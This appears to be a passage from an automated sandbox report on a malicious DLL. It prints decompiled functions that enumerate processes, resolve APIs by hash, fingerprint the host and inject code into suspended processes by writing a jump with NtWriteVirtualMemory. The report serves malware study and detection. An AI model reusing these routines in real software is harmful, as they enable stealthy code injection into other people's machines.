Part of subcall function 1000C6CB: CreateWindowExA.USER32 ref: 1000C7BB
Part of subcall function 1000C6CB: DestroyWindow.USER32(00000000), ref: 1000C7C6
Part of subcall function 1000C6CB: UnregisterClassA.USER32 ref: 1000C7D1

memset.MSVCRT ref: 1000CBC3
GetThreadContext.KERNELBASE(?,00010002,?,00000000,00000000), ref: 1000CBE4
NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC2D
NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC4A
NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC6B

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$ContextDestroyFreeLoadRegisterSectionThreadUnregisterWrite
String ID:
API String ID: 850789531-0
Opcode ID: 81e1878cde3c01e1741f75c6aa3df445a148ed532b2f4d400af4b30928b6dc9e
Instruction ID: 8dc3fb5d1cfe451f8c4839fb180d38a9adec49fd8f8a3984ebf3c7f861d3db7f
Opcode Fuzzy Hash: 81e1878cde3c01e1741f75c6aa3df445a148ed532b2f4d400af4b30928b6dc9e
Instruction Fuzzy Hash: EA311A72A04219AFFB01DFA4CD89F9EB7B8EF08390F114265E505E61A4D731DE448F90

Uniqueness

Uniqueness Score: -1.00%

Function 1000AB89, Relevance: 7.6, APIs: 5, Instructions: 65
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000AB89(intOrPtr __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				signed int _t14;
				signed int _t15;
				void* _t22;
				intOrPtr _t28;
				void* _t31;
				intOrPtr _t33;
				void* _t40;
				void* _t42;

				_t33 = __ecx;
				_t31 = __edx; // executed
				_t14 = CreateToolhelp32Snapshot(2, 0);
				_t42 = _t14;
				_t15 = _t14 | 0xffffffff;
				if(_t42 != _t15) {
					memset( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t42,  &_v304) != 0) {
						while(1) {
							_t22 = E1000CCCB(_t33,  &_v308, _t31); // executed
							_t40 = _t22;
							if(_t40 == 0) {
								break;
							}
							_t33 =  *0x1001e684; // 0x306f878
							if(Process32Next(_t42,  &_v308) != 0) {
								continue;
							}
							break;
						}
						CloseHandle(_t42);
						_t15 = 0 | _t40 == 0x00000000;
					} else {
						_t28 =  *0x1001e684; // 0x306f878
						 *((intOrPtr*)(_t28 + 0x30))(_t42);
						_t15 = 0xfffffffe;
					}
				}
				return _t15;
			}

0x1000ab89
0x1000aba1
0x1000aba3
0x1000aba6
0x1000aba8
0x1000abad
0x1000abbc
0x1000abc4
0x1000abd8
0x1000abe8
0x1000abee
0x1000abf3
0x1000abf9
0x00000000
0x00000000
0x1000abfb
0x1000ac0c
0x00000000
0x00000000
0x00000000
0x1000ac0c
0x1000ac14
0x1000ac1b
0x1000abda
0x1000abda
0x1000abe0
0x1000abe5
0x1000abe5
0x1000abd8
0x1000ac24

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABA3
memset.MSVCRT ref: 1000ABBC
Process32First.KERNEL32(00000000,?), ref: 1000ABD3
Process32Next.KERNEL32(00000000,?), ref: 1000AC07
CloseHandle.KERNELBASE(00000000), ref: 1000AC14

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32memset
String ID:
API String ID: 1267121359-0
Opcode ID: b96f3aeff797ebc95a186c73b0c318709a57fc9dd53ef4a83a583534a18eeda1
Instruction ID: 12e21ce9a58b3ff76d4a50db47e98f108d0fce0e5cc8861effe551863d451460
Opcode Fuzzy Hash: b96f3aeff797ebc95a186c73b0c318709a57fc9dd53ef4a83a583534a18eeda1
Instruction Fuzzy Hash: 261194722047516BE310DBA8CC89E9F37DCEB863A0F560A29F514C7185EB30D8058762

Uniqueness

Uniqueness Score: -1.00%

Function 1000DFB8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000DFB8(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E1000D40B( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C384( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

0x1000dfc1
0x1000dfc3
0x1000dfc6
0x1000dfc9
0x1000dfcf
0x1000e02c
0x00000000
0x1000e02c
0x1000dfd1
0x1000dfdc
0x1000dfdf
0x1000dfe4
0x1000dfe9
0x1000dfec
0x1000dfee
0x1000dff1
0x1000dff4
0x1000dff9
0x00000000
0x00000000
0x00000000
0x00000000
0x1000dffb
0x1000dffb
0x1000e00d
0x1000e01a
0x1000e01e
0x00000000
0x00000000
0x1000e020
0x1000e023
0x1000e024
0x1000e02a
0x00000000
0x00000000
0x00000000
0x1000e02a
0x1000e041
0x1000e046
0x1000e04a
0x00000000
0x1000e056
0x1000e056
0x1000e058
0x1000e058
0x1000e05e
0x00000000
0x00000000
0x1000e064
0x1000e068
0x1000e06c
0x00000000
0x00000000
0x00000000
0x1000e06c
0x1000e072
0x1000e07a
0x1000e07f
0x1000e082
0x1000e082
0x1000e084
0x1000e088
0x1000e090
0x00000000
0x00000000
0x1000e094
0x1000e09c
0x00000000
0x00000000
0x00000000
0x1000e09c

APIs

LoadLibraryA.KERNELBASE(.dll,1000604A,0000011C,00000000), ref: 1000E088
GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E094

Strings

.dll, xrefs: 1000E084, 1000E087

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: a4feeca1574f2cd99d59b1fbc4639384f3d17a533a0fe7c5f4faee7675ce88ca
Instruction ID: 92068ddf64b08cb5eb3d3d525696bfeba362b6a2b2ffb4815a15ed8f4a6c1621
Opcode Fuzzy Hash: a4feeca1574f2cd99d59b1fbc4639384f3d17a533a0fe7c5f4faee7675ce88ca
Instruction Fuzzy Hash: 9831F535A002999BEB54CF69C8C47AEBBF5EF44384F244469D945E7209DBB0ED82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10005F6A, Relevance: 12.1, APIs: 8, Instructions: 104
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				long _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t20;
				struct HINSTANCE__* _t23;
				long _t24;
				long _t25;
				char* _t29;
				WCHAR* _t34;
				long _t35;
				void* _t40;
				void* _t52;
				struct _SECURITY_ATTRIBUTES* _t56;
				void* _t57;
				intOrPtr* _t58;
				void* _t60;

				_t52 = __edx;
				if(_a8 != 1) {
					if(_a8 == 0) {
						TerminateThread( *0x1001e6a8, 0);
					}
					L15:
					return 1;
				}
				E100085D5();
				_t20 = E100097F2( &_v16);
				_t60 = _t52;
				if(_t60 < 0 || _t60 <= 0 && _t20 < 0x2e830) {
					goto L15;
				} else {
					E10008F5E();
					GetModuleHandleA(0);
					_t23 = _a4;
					 *0x1001e69c = _t23;
					_t24 = GetModuleFileNameW(_t23,  &_v664, 0x104);
					_t25 = GetLastError();
					if(_t24 == 0 || _t25 == 0x7a) {
						L10:
						return 0;
					} else {
						memset( &_v144, 0, 0x80);
						_t58 = _t57 + 0xc;
						_t56 = 0;
						do {
							_t29 = E100095AD(_t56);
							_a8 = _t29;
							MultiByteToWideChar(0, 0, _t29, 0xffffffff,  &_v144, 0x3f);
							E100085A8( &_a8);
							_t56 =  &(_t56->nLength);
						} while (_t56 < 0x2710);
						E10012A66( *0x1001e69c);
						 *_t58 = 0x7c3;
						 *0x1001e684 = E1000E1C7(0x1001ba20, 0x11c);
						 *_t58 = 0xb4e;
						_t34 = E100095C7(0x1001ba20);
						_a8 = _t34;
						_t35 = GetFileAttributesW(_t34); // executed
						_push( &_a8);
						if(_t35 == 0xffffffff) {
							E100085BB();
							_v8 = 0;
							_t40 = CreateThread(0, 0, E10005DEE, 0, 0,  &_v8);
							 *0x1001e6a8 = _t40;
							if(_t40 != 0) {
								goto L15;
							}
							goto L10;
						}
						E100085BB();
						goto L10;
					}
				}
			}

0x10005f6a
0x10005f79
0x100060a6
0x100060b6
0x100060b6
0x100060bc
0x00000000
0x100060be
0x10005f7f
0x10005f87
0x10005f8e
0x10005f90
0x00000000
0x10005fa3
0x10005fa3
0x10005fa9
0x10005faf
0x10005fbf
0x10005fc4
0x10005fcc
0x10005fd4
0x10006075
0x00000000
0x10005fe3
0x10005ff0
0x10005ff5
0x10005ff8
0x10005ffa
0x10005ffc
0x10006009
0x10006012
0x1000601b
0x10006020
0x10006021
0x1000602f
0x10006039
0x1000604a
0x1000604f
0x10006056
0x1000605d
0x10006060
0x1000606c
0x1000606d
0x10006079
0x10006082
0x10006094
0x10006097
0x1000609e
0x00000000
0x00000000
0x00000000
0x100060a0
0x1000606f
0x00000000
0x10006074
0x10005fd4

APIs

TerminateThread.KERNELBASE(00000000), ref: 100060B6

Part of subcall function 100085D5: HeapCreate.KERNELBASE(00000000,00080000,00000000,10005F84), ref: 100085DE

Part of subcall function 100097F2: GetSystemTimeAsFileTime.KERNEL32(?,?,10005F8C), ref: 100097FF

GetModuleHandleA.KERNEL32(00000000), ref: 10005FA9
GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FC4
GetLastError.KERNEL32 ref: 10005FCC
memset.MSVCRT ref: 10005FF0
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006012
GetFileAttributesW.KERNELBASE(00000000), ref: 10006060
CreateThread.KERNEL32(00000000,00000000,10005DEE,00000000,00000000,?), ref: 10006094

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CreateModuleThreadTime$AttributesByteCharErrorHandleHeapLastMultiNameSystemTerminateWidememset
String ID:
API String ID: 1832041143-0
Opcode ID: 7e808ea799e680f3c2fd863b6732618b7865da000cb2eca94c581aef9a0140a7
Instruction ID: a20790f259ae4b3f06c91942fa7be99be5cb131edc2f008d1ecb11abc9cb9497
Opcode Fuzzy Hash: 7e808ea799e680f3c2fd863b6732618b7865da000cb2eca94c581aef9a0140a7
Instruction Fuzzy Hash: 2631C275840154ABFB11DB20CC89EAE37B9EB487A0F20C529F859D6195EB34AB45CB22

Uniqueness

Uniqueness Score: -1.00%

Function 1000B78E, Relevance: 7.6, APIs: 5, Instructions: 83
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000B78E(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t23;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x1001e684; // 0x306f878
				 *((intOrPtr*)(_t23 + 0xb0))( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E100095C7(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E100085BB( &_v16);
				_t33 = E1000C39D(_t43);
				E10009626( &(_t43[E1000C39D(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E1000C39D(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E1000D40B(_t43, E1000C39D(_t43) + _t40, 0);
			}

0x1000b78e
0x1000b797
0x1000b7a3
0x1000b7a9
0x1000b7ab
0x1000b7b3
0x1000b7c1
0x1000b7c6
0x1000b7d5
0x1000b7e0
0x1000b7ed
0x1000b807
0x1000b80c
0x1000b80e
0x1000b815
0x1000b825
0x1000b836
0x1000b840
0x1000b848
0x1000b84f
0x1000b852
0x1000b86f

APIs

memset.MSVCRT ref: 1000B7AB
lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B7D5
GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B807

Part of subcall function 10009626: _vsnwprintf.MSVCRT ref: 10009643

lstrcatW.KERNEL32(?,00000114), ref: 1000B840
CharUpperBuffW.USER32(?,00000000), ref: 1000B852

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
String ID:
API String ID: 455400327-0
Opcode ID: b942919f709bbc5ee76562d8b93a0ca6cadf47ed1a8cc120fd559aea66f26d5c
Instruction ID: 54ded0e5f58a315f66d10a54a7c6d114594958cb431f06a38f87ddf0e98dcf8a
Opcode Fuzzy Hash: b942919f709bbc5ee76562d8b93a0ca6cadf47ed1a8cc120fd559aea66f26d5c
Instruction Fuzzy Hash: 0F2153B6900218BFE714DBB4CC8AFEE77BCEB58250F108569F505D6185EA74AF448B60

Uniqueness

Uniqueness Score: -1.00%

Function 1000CA30, Relevance: 4.6, APIs: 3, Instructions: 120
threadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000CA30(intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t54;
				intOrPtr _t57;
				long _t61;
				intOrPtr _t62;
				signed int _t65;
				signed int _t68;
				signed int _t82;
				void* _t85;
				char _t86;

				_v8 = _v8 & 0x00000000;
				_v20 = __edx;
				_t65 = 0;
				_t37 = E1000C908( &_v8);
				_t86 = _t37;
				_v24 = _t86;
				_t87 = _t86;
				if(_t86 == 0) {
					return _t37;
				}
				_t38 =  *0x1001e688; // 0x2ff04a0
				E1000A853( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t87);
				_t82 = _v8;
				_t68 = 0;
				_v16 = 0;
				if(_t82 == 0) {
					L20:
					E10008600( &_v24, 0);
					return _t65;
				}
				while(_t65 == 0) {
					while(_t65 == 0) {
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t45 = E1000AE4C( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
						_t92 = _t45;
						if(_t45 >= 0) {
							_t54 = E1000CB82(E10005CD4,  &_v40, _t92, _v20); // executed
							if(_t54 != 0) {
								_t57 =  *0x1001e684; // 0x306f878
								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
								if(_t85 != 0) {
									GetLastError();
									_t61 = ResumeThread(_v36);
									_t62 =  *0x1001e684; // 0x306f878
									if(_t61 != 0) {
										_push(0xea60);
										_push(_t85);
										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
											_t65 = _t65 + 1;
										}
										_t62 =  *0x1001e684; // 0x306f878
									}
									CloseHandle(_t85);
								}
							}
						}
						if(_v40 != 0) {
							if(_t65 == 0) {
								_t52 =  *0x1001e684; // 0x306f878
								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
							}
							_t48 =  *0x1001e684; // 0x306f878
							 *((intOrPtr*)(_t48 + 0x30))(_v36);
							_t50 =  *0x1001e684; // 0x306f878
							 *((intOrPtr*)(_t50 + 0x30))(_v40);
						}
						_t68 = _v16;
						_t47 = _v12 + 1;
						_v12 = _t47;
						if(_t47 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t82 = _v8;
					_t68 = _t68 + 1;
					_v16 = _t68;
					if(_t68 < _t82) {
						continue;
					} else {
						break;
					}
					do {
						goto L19;
					} while (_t82 != 0);
					goto L20;
				}
				L19:
				E10008600(_t86, 0xfffffffe);
				_t86 = _t86 + 4;
				_t82 = _t82 - 1;
			}

0x1000ca36
0x1000ca3f
0x1000ca42
0x1000ca44
0x1000ca49
0x1000ca4b
0x1000ca4e
0x1000ca50
0x1000cb81
0x1000cb81
0x1000ca56
0x1000ca68
0x1000ca6d
0x1000ca70
0x1000ca72
0x1000ca77
0x1000cb6e
0x1000cb74
0x00000000
0x1000cb7d
0x1000ca7d
0x1000ca88
0x1000ca95
0x1000ca99
0x1000ca9a
0x1000ca9b
0x1000ca9f
0x1000caa4
0x1000caa6
0x1000cab3
0x1000cabb
0x1000cac6
0x1000cad1
0x1000cad5
0x1000cad7
0x1000cae5
0x1000caed
0x1000caf2
0x1000caf4
0x1000caf9
0x1000caff
0x1000cb01
0x1000cb01
0x1000cb02
0x1000cb02
0x1000cb08
0x1000cb08
0x1000cad5
0x1000cabb
0x1000cb0f
0x1000cb13
0x1000cb15
0x1000cb1e
0x1000cb1e
0x1000cb24
0x1000cb2c
0x1000cb2f
0x1000cb37
0x1000cb37
0x1000cb3d
0x1000cb40
0x1000cb41
0x1000cb47
0x00000000
0x00000000
0x00000000
0x00000000
0x1000cb47
0x1000cb4d
0x1000cb50
0x1000cb51
0x1000cb56
0x00000000
0x00000000
0x00000000
0x00000000
0x1000cb5c
0x00000000
0x00000000
0x00000000
0x1000cb5c
0x1000cb5c
0x1000cb5f
0x1000cb65
0x1000cb69

APIs

Part of subcall function 1000AE4C: memset.MSVCRT ref: 1000AE6B
Part of subcall function 1000AE4C: CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AE8B

Part of subcall function 1000CB82: memset.MSVCRT ref: 1000CBC3
Part of subcall function 1000CB82: GetThreadContext.KERNELBASE(?,00010002,?,00000000,00000000), ref: 1000CBE4
Part of subcall function 1000CB82: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC2D
Part of subcall function 1000CB82: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC4A
Part of subcall function 1000CB82: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC6B
Part of subcall function 1000CB82: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC7E

GetLastError.KERNEL32(?,00000001), ref: 1000CAD7
ResumeThread.KERNELBASE(?,?,00000001), ref: 1000CAE5
CloseHandle.KERNELBASE(00000000,?,00000001), ref: 1000CB08

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryVirtual$ProtectThreadmemset$CloseContextCreateErrorFreeHandleLastLibraryProcessResumeWrite
String ID:
API String ID: 255987474-0
Opcode ID: f017f5ca36172552206ab6814e1b6acc202bbb2cd86ed6c5daeb2e80a43bce25
Instruction ID: e521cf2fa20f76da4a6a589b73753f886015824dfe40e4b6c65f35b4029dd3c9
Opcode Fuzzy Hash: f017f5ca36172552206ab6814e1b6acc202bbb2cd86ed6c5daeb2e80a43bce25
Instruction Fuzzy Hash: BC416175A00319AFEB41CFA8C985EAE77F9EF58390F624168F501E7265DB30AE04CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1000B97E, Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E1000B97E(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E100085EA(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E10008600( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

0x1000b981
0x1000b982
0x1000b989
0x1000b991
0x1000b995
0x1000b99e
0x1000b9e4
0x1000b9e4
0x1000b9ab
0x1000b9b3
0x1000b9b5
0x1000b9bb
0x1000b9d4
0x00000000
0x1000b9d6
0x1000b9db
0x00000000
0x1000b9e1
0x1000b9bd
0x1000b9bd
0x1000b9bd
0x1000b9bd
0x1000b9bb
0x1000b9ea

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,73BCF500,00000000,10000000,00000000,00000000,?,1000BA1D,?,00000000,?,1000D0B3), ref: 1000B999
GetLastError.KERNEL32(?,1000BA1D,?,00000000,?,1000D0B3), ref: 1000B9A0

Part of subcall function 100085EA: HeapAlloc.KERNEL32(00000008,?,?,10008F6A,00000100,?,10005FA8), ref: 100085F8

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA1D,?,00000000,?,1000D0B3), ref: 1000B9CF

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: InformationToken$AllocErrorHeapLast
String ID:
API String ID: 4258577378-0
Opcode ID: 9279372076375fae395de7efc729ad16c310fd33d23b52249bdd110484013589
Instruction ID: 284435f3304a0403768820705fc5d69a9fc577f17fcada2a8c023e96f564319f
Opcode Fuzzy Hash: 9279372076375fae395de7efc729ad16c310fd33d23b52249bdd110484013589
Instruction Fuzzy Hash: C401AD72600625BFE724CFA5DC89D8F7FECEF456E47220126FA05E2214E630DE0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000AE4C, Relevance: 3.0, APIs: 2, Instructions: 46
processCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000AE4C(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;
				WCHAR* _t15;
				int _t19;
				struct _PROCESS_INFORMATION* _t20;

				_t20 = __edx;
				_t15 = __ecx;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t19 = 0x44;
				memset( &_v72, 0, _t19);
				_v72.cb = _t19;
				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}

0x1000ae55
0x1000ae5b
0x1000ae5f
0x1000ae60
0x1000ae61
0x1000ae62
0x1000ae66
0x1000ae6b
0x1000ae73
0x1000ae8b
0x1000ae91
0x1000ae99

APIs

memset.MSVCRT ref: 1000AE6B
CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AE8B

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateProcessmemset
String ID:
API String ID: 2296119082-0
Opcode ID: 174ec3214e28821afa587fbbfd75607311efd5e59e5c1ad3bc0eb5b6b150231f
Instruction ID: 317c0f0a3250aa545c808d97f4cc2eb77fe6aff884bafd0b8a01d2d5859a8f4e
Opcode Fuzzy Hash: 174ec3214e28821afa587fbbfd75607311efd5e59e5c1ad3bc0eb5b6b150231f
Instruction Fuzzy Hash: 61F01CF26042187FF760DAADDC46EBBB7ACCB88664F104532FA05D61A0E560ED0582A1

Uniqueness

Uniqueness Score: -1.00%

Function 1000E1C7, Relevance: 3.0, APIs: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000E1C7(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E100095AD(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E1000E17C(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E100085A8( &_v8);
				return _t25;
			}

0x1000e1ca
0x1000e1cd
0x1000e1d3
0x1000e1d5
0x1000e1da
0x1000e1dc
0x1000e1e6
0x1000e1e7
0x1000e1f6
0x1000e1e9
0x1000e1e9
0x1000e1e9
0x1000e1fa
0x1000e201
0x1000e207
0x1000e207
0x1000e20c
0x1000e217

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,1001BA20), ref: 1000E1E9
LoadLibraryA.KERNELBASE(00000000,00000000,00000001,?,1001BA20), ref: 1000E1F6

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: cf321a245d88a0638fbef26b27aa7ee3fe0e7c4b77512a4ccbee289a1163a098
Instruction ID: a81f8a8a0c32fb3f2a3472acf433f6b75368d58d8bdf92bb45fed00c9d335e66
Opcode Fuzzy Hash: cf321a245d88a0638fbef26b27aa7ee3fe0e7c4b77512a4ccbee289a1163a098
Instruction Fuzzy Hash: D1F08231700164ABF704DB6DDC8589EB3ECDB987D1711413AF406E3155DA70EE4087E1

Uniqueness

Uniqueness Score: -1.00%

Function 1000CCCB, Relevance: 2.5, APIs: 2, Instructions: 48
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CCCB(void* __ecx, intOrPtr _a4, signed int _a8) {
				CHAR* _v8;
				int _t28;
				signed int _t31;
				signed int _t34;
				signed int _t35;
				void* _t38;
				signed int* _t41;

				_t41 = _a8;
				_t31 = 0;
				if(_t41[1] > 0) {
					_t38 = 0;
					do {
						_t3 =  &(_t41[2]); // 0xe6840d8b
						_t34 =  *_t3;
						_t35 = 0;
						_a8 = 0;
						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
